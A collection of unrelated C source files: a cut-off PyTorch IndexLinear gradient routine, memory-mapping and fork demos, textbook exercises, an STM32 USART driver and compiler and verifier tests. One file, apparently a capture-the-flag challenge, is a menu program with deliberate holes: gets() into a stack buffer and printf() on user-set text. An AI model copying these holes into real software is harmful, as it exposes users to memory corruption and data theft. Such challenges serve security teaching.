1, or > 1 * This allows for some optimizations. * No multithreading here as this could * corrupt the results (hogwild style) */ if (outDim == 1) { if (maxNormalize) { int64_t offset = 0; for (j = 0; j < batchSize; j++) { scalar_t* lgradOutputData = gradOutputData + j; *biasData -= *lgradOutputData * scale; scalar_t val = *lgradOutputData * scale; for (i = 0; i < sizesData[j]; i++) { int64_t idx = weightStride0*(keysData[offset] + keysOffset) + maxNormalize; weightData[idx-1] -= weightData[idx]*val*weightData[idx-2]; weightData[idx] -= (val*valuesData[offset] - weightDecay * weightData[idx])*weightData[idx-2]; offset++; } } offset = 0; for (j = 0; j < batchSize; j++) { for (i = 0; i < sizesData[j]; i++) { int64_t idx = weightStride0*(keysData[offset] + keysOffset) + maxNormalize; weightData[idx-2] = 0; offset++; } } } else { if (weightDecay) { int64_t offset = 0; for (j = 0; j < batchSize; j++) { scalar_t* lgradOutputData = gradOutputData + j; *biasData -= *lgradOutputData * scale; scalar_t val = *lgradOutputData * scale; for (i = 0; i < sizesData[j]; i++) { int64_t idx = weightStride0*(keysData[offset] + keysOffset); weightData[idx] -= val * valuesData[offset] + weightData[idx] * weightDecay; offset++; } } } else { int64_t offset = 0; for (j = 0; j < batchSize; j++) { scalar_t val = gradOutputData[j] * scale; for (i = 0; i < sizesData[j]; i++) { weightData[(keysData[offset] + keysOffset)*weightStride0] -= val * valuesData[offset]; offset++; } *biasData -= val; } } } } else { int64_t offset = 0; for (j = 0; j < batchSize; j++) { scalar_t* lgradOutputData = gradOutputData + j*outDim; scalar_t* lweightData = weightData; THVector_(cadd)(biasData, biasData, lgradOutputData, -scale, outDim); for (i = 0; i < sizesData[j]; i++) { scalar_t val = valuesData[offset] * scale; scalar_t wd = weightDecay; // Max normalize case if (maxNormalize) { lweightData = weightData + weightStride0*(keysData[offset] + keysOffset) + (maxNormalize-2); val *= lweightData[0]; wd *= lweightData[0]; for (k=0; k < outDim; k++) { lweightData[1] -= lweightData[k+2]*scale*lgradOutputData[k]*lweightData[0]; } lweightData += 2; } else { lweightData = weightData + weightStride0*(keysData[offset] + keysOffset); } /* We do sparse weight decay. * We think it makes more sense. */ if (weightDecay) { if (outDim > THNN_SPARSE_OUTDIM_THRESHOLD) { THBlas_(axpy)(outDim, -wd, lweightData, 1, lweightData, 1); } else { for (k=0; k < outDim; k++) { lweightData[k] -= wd * lweightData[k]; } } } if (outDim > THNN_SPARSE_OUTDIM_THRESHOLD) { THBlas_(axpy)(outDim, -val, lgradOutputData, 1, lweightData, 1); } else { for (k=0; k < outDim; k++) { lweightData[k] -= val * lgradOutputData[k]; } } offset++; } } /* Max Normalize case: * Reset the smart update scaling if * one does it batch-wise. * TODO: Decide what to do with that piece of code. * NB: If the code belowe is uncommented, so should the commented * code in IndexLinear:zeroGradParameters() */ /* if (maxNormalize) { offset = 0; for (j = 0; j < batchSize; j++) { scalar_t* lweightData = weightData; for (i = 0; i < sizesData[j]; i++) { scalar_t val = valuesData[offset] * scale; scalar_t wd = weightDecay; lweightData = weightData + weightStride0*(keysData[offset] + keysOffset) + (maxNormalize-2); lweightData[0] = 0; offset++; } } } */ } return; } void THNN_(IndexLinear_accGradParameters)( THNNState *state, THLongTensor *keys, int64_t keysOffset, THTensor *values, THLongTensor *sizes, THLongTensor *cumSumSizes, THTensor *gradOutput, THTensor *gradWeight, THTensor *gradBias, THTensor *weight, THTensor *bias, THTensor *valuesBuffer, accreal weightDecay_, accreal scale_) { scalar_t scale = TH_CONVERT_ACCREAL_TO_REAL(scale_); /* Retrieve all the dimensions of the problem */ int64_t batchSize = THLongTensor_size(sizes, 0); int64_t keysSize = THLongTensor_size(keys, 0); int64_t outDim = THTensor_(size)(bias, 0); int64_t woutDim = THTensor_(size)(weight, 1); int64_t maxNormalize = (woutDim - outDim) > 0 ?1:0; THArgCheck(THNN_(checkKeysValues)(keys, values), 1, "Keys and values should have the same number of elements"); int64_t* sizesData = THLongTensor_data(sizes); /* COmpute the cumulative sizes */ THLongTensor* cumSizes = THLongTensor_new(); THLongTensor_cumsum(cumSizes, sizes, 0); int64_t* cumSizesData = THLongTensor_data(cumSizes); /* Resize the gradWeight buffer to keep it dense. * That speeds up updates A LOT assuming random mem access. */ THTensor_(resize2d)(gradWeight, keysSize, outDim * (maxNormalize>0?2:1)); /* Access the storage data/strides */ scalar_t* gradOutputData = gradOutput->data<scalar_t>(); scalar_t* valuesData =values->data<scalar_t>(); scalar_t* gradWeightData = gradWeight->data<scalar_t>(); scalar_t* gradBiasData = gradBias->data<scalar_t>(); /* Make sure these inputs are contiguous to accelerate computations */ THArgCheck(THLongTensor_isContiguous(keys), 1, "keys vector must be contiguous"); THArgCheck(THTensor_(isContiguous)(values), 3, "values vector must be contiguous"); THArgCheck(THTensor_(isContiguous)(gradOutput), 6, "gradOutput vector must be contiguous"); THArgCheck(THTensor_(isContiguous)(gradWeight), 7, "gradWeight must be contiguous"); THArgCheck(THTensor_(isContiguous)(gradBias), 8, "gradBias vector must be contiguous"); THArgCheck(THTensor_(isContiguous)(weight), 9, "weight must be contiguous"); THArgCheck(THTensor_(isContiguous)(bias), 10, "bias vector must be contiguous"); THArgCheck(THTensor_(isContiguous)(valuesBuffer), 11, "valuesBuffer must be contiguous"); int i,j,k; /* Separate cases: output dimension is == 1, or > 1 * This allows for some optimizations. * No multithreading here as this could * corrupt the results (hogwild style) */ if (outDim == 1) { for (j = 0; j < batchSize; j++) { int64_t offset = j==0?0:cumSizesData[j-1]; scalar_t val = gradOutputData[j] * scale; scalar_t* lgradWeightData = gradWeightData + offset; scalar_t* lvaluesData = valuesData + offset; int64_t end = sizesData[j]; if (maxNormalize) { lgradWeightData += offset; i = 0; for(;i < end; i++) { lgradWeightData[2*i] = val; lgradWeightData[2*i+1] = val * lvaluesData[i]; } } else { i = 0; for(;i < end-4; i += 4) { lgradWeightData[i] = val * lvaluesData[i]; lgradWeightData[i+1] = val * lvaluesData[i+1]; lgradWeightData[i+2] = val * lvaluesData[i+2]; lgradWeightData[i+3] = val * lvaluesData[i+3]; } for(; i < end; i++) { lgradWeightData[i] = val * lvaluesData[i]; } } *gradBiasData += val; offset += end; } } else { for (j = 0; j < batchSize; j++) { int64_t offset = j==0?0:cumSizesData[j-1]; scalar_t* lgradOutputData = gradOutputData + j*outDim; scalar_t* lgradWeightData = gradWeightData; THVector_(cadd)(gradBiasData, gradBiasData, lgradOutputData, scale, outDim); for (i = 0; i < sizesData[j]; i++) { scalar_t val = valuesData[offset] * scale; lgradWeightData = gradWeightData + offset*outDim; if (maxNormalize) { lgradWeightData += offset*outDim; k = 0; for(;k < outDim-4; k += 4) { lgradWeightData[k] = lgradOutputData[k]*scale; lgradWeightData[k+1] = lgradOutputData[k+1]*scale; lgradWeightData[k+2] = lgradOutputData[k+2]*scale; lgradWeightData[k+3] = lgradOutputData[k+3]*scale; } for(; k < outDim; k++) { lgradWeightData[k] = lgradOutputData[k]*scale; } lgradWeightData += outDim; } k = 0; for(;k < outDim-4; k += 4) { lgradWeightData[k] = val * lgradOutputData[k]; lgradWeightData[k+1] = val * lgradOutputData[k+1]; lgradWeightData[k+2] = val * lgradOutputData[k+2]; lgradWeightData[k+3] = val * lgradOutputData[k+3]; } for(; k < outDim; k++) { lgradWeightData[k] = val * lgradOutputData[k]; } offset++; } } } THLongTensor_free(cumSizes); return; } #endif
the_stack_data/489196.c
#define _GNU_SOURCE #include <assert.h> /* assert */ #include <omp.h> /* openmp library */ #include <stdio.h> /* printf */ #include <stdlib.h> /* EXIT_SUCCESS */ #include <string.h> /* memset */ #include <sys/mman.h> /* mmap, mremap, munmap */ #include <unistd.h> /* sysconf */ int main() { int ret; size_t i, len, pagesize; char * addr; pagesize = sysconf(_SC_PAGESIZE); len = 4*pagesize; /* mmap a persistent memory region. */ addr = mmap(NULL, len, PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_NORESERVE, -1, 0); assert(MAP_FAILED != addr); /* initialize memory region with invalid values. */ memset(addr, ~0, len); /* remove all access privileges from persistent memory region. */ ret = mprotect(addr, len, PROT_NONE); assert(-1 != ret); #pragma omp parallel num_threads(4) default(none) shared(addr,pagesize) \ private(ret) { int tid; char * taddr; tid = omp_get_thread_num(); /* mmap a page into a temporary address with write privileges. */ taddr = mmap(NULL, pagesize, PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_NORESERVE, -1, 0); assert(MAP_FAILED != taddr); /* fill temporary page. */ memset(taddr, tid, pagesize); /* remove write privileges from temporary page and grant read-only * privileges. */ ret = mprotect(taddr, pagesize, PROT_READ); assert(-1 != ret); /* mremap temporary page to the correct location in persistent memory * region. */ taddr = mremap(taddr, pagesize, pagesize, MREMAP_MAYMOVE|MREMAP_FIXED, addr+tid*pagesize); assert(MAP_FAILED != taddr); } /* validate results. */ for (i=0; i<len; ++i) assert((char)(i/pagesize) == addr[i]); /* coalesce adjacent mappings (unnecessary). */ //addr = mremap(addr, len, len, 0); //assert(MAP_FAILED != addr); /* unmap persistent memory region. */ munmap(addr, len); return EXIT_SUCCESS; }
the_stack_data/198582069.c
/** * @author : tommy (tommy@ven1xus-mbp) * @file : exercise1-22 * @created : Monday Jan 07, 2019 22:58:01 EST */ // Fold the input text across some arbitrary column of input (in this case: MAX_COLUMN) #include <stdio.h> #define MAX_COLUMN 35 #define MAX_LENGTH 1000 int main(void) { char input[MAX_LENGTH]; char c; int len; while(len < MAX_LENGTH && (c = getchar()) != '\n') { if(c != '\t' && c != '\b' && c != ' ') { input[len] = c; } else { input[len] = '/'; } len++; } input[len] = '\0'; for(int i = 0; input[i] != '\0';i++) { if(i%MAX_COLUMN == 0) printf("\n"); putchar(input[i]); } printf("\n"); return 0; }
the_stack_data/128217.c
#include <unistd.h> void ft_swap(int *a, int *b) { int f; f = *a; *a = *b; *b = f; }
the_stack_data/151704469.c
/* Copyright 2018 Google LLC Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at https://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #define MOTD_LEN 256 char MOTD[MOTD_LEN]; char *DEFAULT_MOTD = "MOTD: Welcome back friend!"; void set_motd(){ char buf[MOTD_LEN]; printf("Enter new message of the day\n"); printf("New msg: "); // Uh oh! gets(buf); strncpy(MOTD, buf, MOTD_LEN); MOTD[MOTD_LEN - 1] = '\0'; printf("New message of the day saved!\n"); return; } void get_motd(){ printf(MOTD); printf("\n"); return; } void set_admin_motd(){ printf("TODO: Allow admin MOTD to be set\n"); return; } void read_flag(); void get_admin_motd(){ uid_t uid = getuid(); if(uid != 0) { printf("You're not root!\n"); } else { read_flag(); } return; } void print_menu(){ printf("Choose functionality to test:\n"); printf("1 - Get user MOTD\n"); printf("2 - Set user MOTD\n"); printf("3 - Set admin MOTD (TODO)\n"); printf("4 - Get admin MOTD\n"); printf("5 - Exit\n"); } int main(int argc, char* argv[]){ void *cmd; char *input; size_t input_len; int choice, nitems = 0; setbuf(stdout, NULL); setbuf(stderr, NULL); fflush(stdin); strcpy(MOTD, DEFAULT_MOTD); while(choice != 5){ print_menu(); printf("choice: "); getline(&input, &input_len, stdin); choice = atoi(input); if(choice == 0){ printf("Unrecognized input!\n"); continue; } else if (choice < 1 || choice > 5){ printf("Not an option!\n"); continue; } else { switch (choice){ case 1: get_motd(); break; case 2: set_motd(); break; case 3: set_admin_motd(); break; case 4: get_admin_motd(); break; case 5: return 0; } } } } void read_flag(){ FILE *fd; char flag[256] = {0}; fd = fopen("./flag.txt", "r"); fscanf(fd,"%s", &flag); printf("Admin MOTD is: %s\n", flag); return; }
the_stack_data/234519248.c
// RUN: %clang_cc1 -emit-llvm %s -o /dev/null // This bit is taken from Sema/wchar.c so we can avoid the wchar.h include. typedef __WCHAR_TYPE__ wchar_t; #if defined(_WIN32) || defined(_M_IX86) || defined(__CYGWIN__) \ || defined(_M_X64) || defined(SHORT_WCHAR) #define WCHAR_T_TYPE unsigned short #elif defined(__sun) || defined(__AuroraUX__) #define WCHAR_T_TYPE long #else /* Solaris or AuroraUX. */ #define WCHAR_T_TYPE int #endif struct { wchar_t *name; } syms = { L"NUL" };
the_stack_data/140855.c
/** ****************************************************************************** * @file stm32l5xx_ll_usart.c * @author MCD Application Team * @brief USART LL module driver. ****************************************************************************** * @attention * * <h2><center>&copy; Copyright (c) 2019 STMicroelectronics. * All rights reserved.</center></h2> * * This software component is licensed by ST under BSD 3-Clause license, * the "License"; You may not use this file except in compliance with the * License. You may obtain a copy of the License at: * opensource.org/licenses/BSD-3-Clause * ****************************************************************************** */ #if defined(USE_FULL_LL_DRIVER) /* Includes ------------------------------------------------------------------*/ #include "stm32l5xx_ll_usart.h" #include "stm32l5xx_ll_rcc.h" #include "stm32l5xx_ll_bus.h" #ifdef USE_FULL_ASSERT #include "stm32_assert.h" #else #define assert_param(expr) ((void)0U) #endif /* USE_FULL_ASSERT */ /** @addtogroup STM32L5xx_LL_Driver * @{ */ #if defined (USART1) || defined (USART2) || defined (USART3) || defined (UART4) || defined (UART5) /** @addtogroup USART_LL * @{ */ /* Private types -------------------------------------------------------------*/ /* Private variables ---------------------------------------------------------*/ /* Private constants ---------------------------------------------------------*/ /* Private macros ------------------------------------------------------------*/ /** @addtogroup USART_LL_Private_Macros * @{ */ #define IS_LL_USART_PRESCALER(__VALUE__) (((__VALUE__) == LL_USART_PRESCALER_DIV1) \ || ((__VALUE__) == LL_USART_PRESCALER_DIV2) \ || ((__VALUE__) == LL_USART_PRESCALER_DIV4) \ || ((__VALUE__) == LL_USART_PRESCALER_DIV6) \ || ((__VALUE__) == LL_USART_PRESCALER_DIV8) \ || ((__VALUE__) == LL_USART_PRESCALER_DIV10) \ || ((__VALUE__) == LL_USART_PRESCALER_DIV12) \ || ((__VALUE__) == LL_USART_PRESCALER_DIV16) \ || ((__VALUE__) == LL_USART_PRESCALER_DIV32) \ || ((__VALUE__) == LL_USART_PRESCALER_DIV64) \ || ((__VALUE__) == LL_USART_PRESCALER_DIV128) \ || ((__VALUE__) == LL_USART_PRESCALER_DIV256)) /* __BAUDRATE__ The maximum Baud Rate is derived from the maximum clock available * divided by the smallest oversampling used on the USART (i.e. 8) */ #define IS_LL_USART_BAUDRATE(__BAUDRATE__) ((__BAUDRATE__) <= 15000000U) /* __VALUE__ In case of oversampling by 16 and 8, BRR content must be greater than or equal to 16d. */ #define IS_LL_USART_BRR_MIN(__VALUE__) ((__VALUE__) >= 16U) /* __VALUE__ BRR content must be lower than or equal to 0xFFFF. */ #define IS_LL_USART_BRR_MAX(__VALUE__) ((__VALUE__) <= 0x0000FFFFU) #define IS_LL_USART_DIRECTION(__VALUE__) (((__VALUE__) == LL_USART_DIRECTION_NONE) \ || ((__VALUE__) == LL_USART_DIRECTION_RX) \ || ((__VALUE__) == LL_USART_DIRECTION_TX) \ || ((__VALUE__) == LL_USART_DIRECTION_TX_RX)) #define IS_LL_USART_PARITY(__VALUE__) (((__VALUE__) == LL_USART_PARITY_NONE) \ || ((__VALUE__) == LL_USART_PARITY_EVEN) \ || ((__VALUE__) == LL_USART_PARITY_ODD)) #define IS_LL_USART_DATAWIDTH(__VALUE__) (((__VALUE__) == LL_USART_DATAWIDTH_7B) \ || ((__VALUE__) == LL_USART_DATAWIDTH_8B) \ || ((__VALUE__) == LL_USART_DATAWIDTH_9B)) #define IS_LL_USART_OVERSAMPLING(__VALUE__) (((__VALUE__) == LL_USART_OVERSAMPLING_16) \ || ((__VALUE__) == LL_USART_OVERSAMPLING_8)) #define IS_LL_USART_LASTBITCLKOUTPUT(__VALUE__) (((__VALUE__) == LL_USART_LASTCLKPULSE_NO_OUTPUT) \ || ((__VALUE__) == LL_USART_LASTCLKPULSE_OUTPUT)) #define IS_LL_USART_CLOCKPHASE(__VALUE__) (((__VALUE__) == LL_USART_PHASE_1EDGE) \ || ((__VALUE__) == LL_USART_PHASE_2EDGE)) #define IS_LL_USART_CLOCKPOLARITY(__VALUE__) (((__VALUE__) == LL_USART_POLARITY_LOW) \ || ((__VALUE__) == LL_USART_POLARITY_HIGH)) #define IS_LL_USART_CLOCKOUTPUT(__VALUE__) (((__VALUE__) == LL_USART_CLOCK_DISABLE) \ || ((__VALUE__) == LL_USART_CLOCK_ENABLE)) #define IS_LL_USART_STOPBITS(__VALUE__) (((__VALUE__) == LL_USART_STOPBITS_0_5) \ || ((__VALUE__) == LL_USART_STOPBITS_1) \ || ((__VALUE__) == LL_USART_STOPBITS_1_5) \ || ((__VALUE__) == LL_USART_STOPBITS_2)) #define IS_LL_USART_HWCONTROL(__VALUE__) (((__VALUE__) == LL_USART_HWCONTROL_NONE) \ || ((__VALUE__) == LL_USART_HWCONTROL_RTS) \ || ((__VALUE__) == LL_USART_HWCONTROL_CTS) \ || ((__VALUE__) == LL_USART_HWCONTROL_RTS_CTS)) /** * @} */ /* Private function prototypes -----------------------------------------------*/ /* Exported functions --------------------------------------------------------*/ /** @addtogroup USART_LL_Exported_Functions * @{ */ /** @addtogroup USART_LL_EF_Init * @{ */ /** * @brief De-initialize USART registers (Registers restored to their default values). * @param USARTx USART Instance * @retval An ErrorStatus enumeration value: * - SUCCESS: USART registers are de-initialized * - ERROR: USART registers are not de-initialized */ ErrorStatus LL_USART_DeInit(USART_TypeDef *USARTx) { ErrorStatus status = SUCCESS; /* Check the parameters */ assert_param(IS_UART_INSTANCE(USARTx)); if (USARTx == USART1) { /* Force reset of USART clock */ LL_APB2_GRP1_ForceReset(LL_APB2_GRP1_PERIPH_USART1); /* Release reset of USART clock */ LL_APB2_GRP1_ReleaseReset(LL_APB2_GRP1_PERIPH_USART1); } else if (USARTx == USART2) { /* Force reset of USART clock */ LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_USART2); /* Release reset of USART clock */ LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_USART2); } else if (USARTx == USART3) { /* Force reset of USART clock */ LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_USART3); /* Release reset of USART clock */ LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_USART3); } else if (USARTx == UART4) { /* Force reset of UART clock */ LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_UART4); /* Release reset of UART clock */ LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_UART4); } else if (USARTx == UART5) { /* Force reset of UART clock */ LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_UART5); /* Release reset of UART clock */ LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_UART5); } else { status = ERROR; } return (status); } /** * @brief Initialize USART registers according to the specified * parameters in USART_InitStruct. * @note As some bits in USART configuration registers can only be written when * the USART is disabled (USART_CR1_UE bit =0), USART Peripheral should be in disabled state prior calling * this function. Otherwise, ERROR result will be returned. * @note Baud rate value stored in USART_InitStruct BaudRate field, should be valid (different from 0). * @param USARTx USART Instance * @param USART_InitStruct pointer to a LL_USART_InitTypeDef structure * that contains the configuration information for the specified USART peripheral. * @retval An ErrorStatus enumeration value: * - SUCCESS: USART registers are initialized according to USART_InitStruct content * - ERROR: Problem occurred during USART Registers initialization */ ErrorStatus LL_USART_Init(USART_TypeDef *USARTx, LL_USART_InitTypeDef *USART_InitStruct) { ErrorStatus status = ERROR; uint32_t periphclk = LL_RCC_PERIPH_FREQUENCY_NO; /* Check the parameters */ assert_param(IS_UART_INSTANCE(USARTx)); assert_param(IS_LL_USART_PRESCALER(USART_InitStruct->PrescalerValue)); assert_param(IS_LL_USART_BAUDRATE(USART_InitStruct->BaudRate)); assert_param(IS_LL_USART_DATAWIDTH(USART_InitStruct->DataWidth)); assert_param(IS_LL_USART_STOPBITS(USART_InitStruct->StopBits)); assert_param(IS_LL_USART_PARITY(USART_InitStruct->Parity)); assert_param(IS_LL_USART_DIRECTION(USART_InitStruct->TransferDirection)); assert_param(IS_LL_USART_HWCONTROL(USART_InitStruct->HardwareFlowControl)); assert_param(IS_LL_USART_OVERSAMPLING(USART_InitStruct->OverSampling)); /* USART needs to be in disabled state, in order to be able to configure some bits in CRx registers */ if (LL_USART_IsEnabled(USARTx) == 0U) { /*---------------------------- USART CR1 Configuration --------------------- * Configure USARTx CR1 (USART Word Length, Parity, Mode and Oversampling bits) with parameters: * - DataWidth: USART_CR1_M bits according to USART_InitStruct->DataWidth value * - Parity: USART_CR1_PCE, USART_CR1_PS bits according to USART_InitStruct->Parity value * - TransferDirection: USART_CR1_TE, USART_CR1_RE bits according to USART_InitStruct->TransferDirection value * - Oversampling: USART_CR1_OVER8 bit according to USART_InitStruct->OverSampling value. */ MODIFY_REG(USARTx->CR1, (USART_CR1_M | USART_CR1_PCE | USART_CR1_PS | USART_CR1_TE | USART_CR1_RE | USART_CR1_OVER8), (USART_InitStruct->DataWidth | USART_InitStruct->Parity | USART_InitStruct->TransferDirection | USART_InitStruct->OverSampling)); /*---------------------------- USART CR2 Configuration --------------------- * Configure USARTx CR2 (Stop bits) with parameters: * - Stop Bits: USART_CR2_STOP bits according to USART_InitStruct->StopBits value. * - CLKEN, CPOL, CPHA and LBCL bits are to be configured using LL_USART_ClockInit(). */ LL_USART_SetStopBitsLength(USARTx, USART_InitStruct->StopBits); /*---------------------------- USART CR3 Configuration --------------------- * Configure USARTx CR3 (Hardware Flow Control) with parameters: * - HardwareFlowControl: USART_CR3_RTSE, USART_CR3_CTSE bits according to * USART_InitStruct->HardwareFlowControl value. */ LL_USART_SetHWFlowCtrl(USARTx, USART_InitStruct->HardwareFlowControl); /*---------------------------- USART BRR Configuration --------------------- * Retrieve Clock frequency used for USART Peripheral */ if (USARTx == USART1) { periphclk = LL_RCC_GetUSARTClockFreq(LL_RCC_USART1_CLKSOURCE); } else if (USARTx == USART2) { periphclk = LL_RCC_GetUSARTClockFreq(LL_RCC_USART2_CLKSOURCE); } else if (USARTx == USART3) { periphclk = LL_RCC_GetUSARTClockFreq(LL_RCC_USART3_CLKSOURCE); } else if (USARTx == UART4) { periphclk = LL_RCC_GetUARTClockFreq(LL_RCC_UART4_CLKSOURCE); } else if (USARTx == UART5) { periphclk = LL_RCC_GetUARTClockFreq(LL_RCC_UART5_CLKSOURCE); } else { /* Nothing to do, as error code is already assigned to ERROR value */ } /* Configure the USART Baud Rate : - prescaler value is required - valid baud rate value (different from 0) is required - Peripheral clock as returned by RCC service, should be valid (different from 0). */ if ((periphclk != LL_RCC_PERIPH_FREQUENCY_NO) && (USART_InitStruct->BaudRate != 0U)) { status = SUCCESS; LL_USART_SetBaudRate(USARTx, periphclk, USART_InitStruct->PrescalerValue, USART_InitStruct->OverSampling, USART_InitStruct->BaudRate); /* Check BRR is greater than or equal to 16d */ assert_param(IS_LL_USART_BRR_MIN(USARTx->BRR)); /* Check BRR is lower than or equal to 0xFFFF */ assert_param(IS_LL_USART_BRR_MAX(USARTx->BRR)); } /*---------------------------- USART PRESC Configuration ----------------------- * Configure USARTx PRESC (Prescaler) with parameters: * - PrescalerValue: USART_PRESC_PRESCALER bits according to USART_InitStruct->PrescalerValue value. */ LL_USART_SetPrescaler(USARTx, USART_InitStruct->PrescalerValue); } /* Endif (=> USART not in Disabled state => return ERROR) */ return (status); } /** * @brief Set each @ref LL_USART_InitTypeDef field to default value. * @param USART_InitStruct pointer to a @ref LL_USART_InitTypeDef structure * whose fields will be set to default values. * @retval None */ void LL_USART_StructInit(LL_USART_InitTypeDef *USART_InitStruct) { /* Set USART_InitStruct fields to default values */ USART_InitStruct->PrescalerValue = LL_USART_PRESCALER_DIV1; USART_InitStruct->BaudRate = 9600U; USART_InitStruct->DataWidth = LL_USART_DATAWIDTH_8B; USART_InitStruct->StopBits = LL_USART_STOPBITS_1; USART_InitStruct->Parity = LL_USART_PARITY_NONE ; USART_InitStruct->TransferDirection = LL_USART_DIRECTION_TX_RX; USART_InitStruct->HardwareFlowControl = LL_USART_HWCONTROL_NONE; USART_InitStruct->OverSampling = LL_USART_OVERSAMPLING_16; } /** * @brief Initialize USART Clock related settings according to the * specified parameters in the USART_ClockInitStruct. * @note As some bits in USART configuration registers can only be written when * the USART is disabled (USART_CR1_UE bit =0), USART Peripheral should be in disabled state prior calling * this function. Otherwise, ERROR result will be returned. * @param USARTx USART Instance * @param USART_ClockInitStruct pointer to a @ref LL_USART_ClockInitTypeDef structure * that contains the Clock configuration information for the specified USART peripheral. * @retval An ErrorStatus enumeration value: * - SUCCESS: USART registers related to Clock settings are initialized according * to USART_ClockInitStruct content * - ERROR: Problem occurred during USART Registers initialization */ ErrorStatus LL_USART_ClockInit(USART_TypeDef *USARTx, LL_USART_ClockInitTypeDef *USART_ClockInitStruct) { ErrorStatus status = SUCCESS; /* Check USART Instance and Clock signal output parameters */ assert_param(IS_UART_INSTANCE(USARTx)); assert_param(IS_LL_USART_CLOCKOUTPUT(USART_ClockInitStruct->ClockOutput)); /* USART needs to be in disabled state, in order to be able to configure some bits in CRx registers */ if (LL_USART_IsEnabled(USARTx) == 0U) { /*---------------------------- USART CR2 Configuration -----------------------*/ /* If Clock signal has to be output */ if (USART_ClockInitStruct->ClockOutput == LL_USART_CLOCK_DISABLE) { /* Deactivate Clock signal delivery : * - Disable Clock Output: USART_CR2_CLKEN cleared */ LL_USART_DisableSCLKOutput(USARTx); } else { /* Ensure USART instance is USART capable */ assert_param(IS_USART_INSTANCE(USARTx)); /* Check clock related parameters */ assert_param(IS_LL_USART_CLOCKPOLARITY(USART_ClockInitStruct->ClockPolarity)); assert_param(IS_LL_USART_CLOCKPHASE(USART_ClockInitStruct->ClockPhase)); assert_param(IS_LL_USART_LASTBITCLKOUTPUT(USART_ClockInitStruct->LastBitClockPulse)); /*---------------------------- USART CR2 Configuration ----------------------- * Configure USARTx CR2 (Clock signal related bits) with parameters: * - Enable Clock Output: USART_CR2_CLKEN set * - Clock Polarity: USART_CR2_CPOL bit according to USART_ClockInitStruct->ClockPolarity value * - Clock Phase: USART_CR2_CPHA bit according to USART_ClockInitStruct->ClockPhase value * - Last Bit Clock Pulse Output: USART_CR2_LBCL bit according to USART_ClockInitStruct->LastBitClockPulse value. */ MODIFY_REG(USARTx->CR2, USART_CR2_CLKEN | USART_CR2_CPHA | USART_CR2_CPOL | USART_CR2_LBCL, USART_CR2_CLKEN | USART_ClockInitStruct->ClockPolarity | USART_ClockInitStruct->ClockPhase | USART_ClockInitStruct->LastBitClockPulse); } } /* Else (USART not in Disabled state => return ERROR */ else { status = ERROR; } return (status); } /** * @brief Set each field of a @ref LL_USART_ClockInitTypeDef type structure to default value. * @param USART_ClockInitStruct pointer to a @ref LL_USART_ClockInitTypeDef structure * whose fields will be set to default values. * @retval None */ void LL_USART_ClockStructInit(LL_USART_ClockInitTypeDef *USART_ClockInitStruct) { /* Set LL_USART_ClockInitStruct fields with default values */ USART_ClockInitStruct->ClockOutput = LL_USART_CLOCK_DISABLE; USART_ClockInitStruct->ClockPolarity = LL_USART_POLARITY_LOW; /* Not relevant when ClockOutput = LL_USART_CLOCK_DISABLE */ USART_ClockInitStruct->ClockPhase = LL_USART_PHASE_1EDGE; /* Not relevant when ClockOutput = LL_USART_CLOCK_DISABLE */ USART_ClockInitStruct->LastBitClockPulse = LL_USART_LASTCLKPULSE_NO_OUTPUT; /* Not relevant when ClockOutput = LL_USART_CLOCK_DISABLE */ } /** * @} */ /** * @} */ /** * @} */ #endif /* USART1 || USART2 || USART3 || UART4 || UART5 */ /** * @} */ #endif /* USE_FULL_LL_DRIVER */ /************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
the_stack_data/148577548.c
struct B { int more_padding; int x; }; struct A { int padding; int *array[10]; struct B array2[10]; int y; }; volatile int glob; void test(struct A *a, int b) { glob = (int)a->array[b]; glob = (int)&a->array[b]; glob = a->array2[b].x; glob = (int)&a->array2[b].x; glob = a[b].y; glob = a->array2[3].x; glob = (int)&a->array2[3].x; }
the_stack_data/1066431.c
#include <stdio.h> #include <stdlib.h> #include<sys/types.h> #include<sys/wait.h> #include <unistd.h> int main(void){ int pid, status; pid = fork(); if(pid > 0){ wait(&status); if(status == 0) printf("friends!\n"); } else { pid = fork(); if(pid > 0){ wait(&status); if(status == 0) { printf("my "); exit(0); } exit(1); } else { printf("Hello "); exit(0); } } return 0; }
the_stack_data/28263516.c
#include <stdio.h> #define MAXLINE 10 /* 允许的输入行的最大长度 */ int getLine(char line[], int maxline); void copy(char to[], char from[]); /*打印最长的输入行*/ int main () { int len; /*当前行长度*/ int max; /*目前为止发现的最长行的长度*/ char line[MAXLINE]; /*当前的输入行*/ char longest[MAXLINE]; /*用于保存最长的行*/ max = 0; while ((len = getLine(line, MAXLINE)) > 0) if (len > max) { max = len; copy(longest, line); } if (max > 0) /*存在这样的行*/ printf("%s", longest); return 0; } /*getLine函数: 将一行读入到s中并返回其长度*/ int getLine(char s[], int lim) { int c, i; for (i=0; i<lim-1 && (c=getchar())!=EOF && c!='\n'; ++i) s[i]=c; if (c == '\n') { s[i] = c; ++i; } s[i] = '\0'; return i; } /*copy函数: 将from复制到to; 这里假定to足够大*/ void copy(char to[], char from []) { int i; i = 0; while ((to[i]=from[i]) != '\0') ++i; }
the_stack_data/98575521.c
#include <stdint.h> struct x { uint64_t a; uint64_t b; }; void foo(void) //@ requires emp; //@ ensures emp; { //@ assert sizeof(struct x) >= 0; //@ assert sizeof(struct x) <= SIZE_MAX; // The compiler can add alignment or padding, so this may not be true //@ assert sizeof(struct x) == 16; //~ should_fail }
the_stack_data/1226663.c
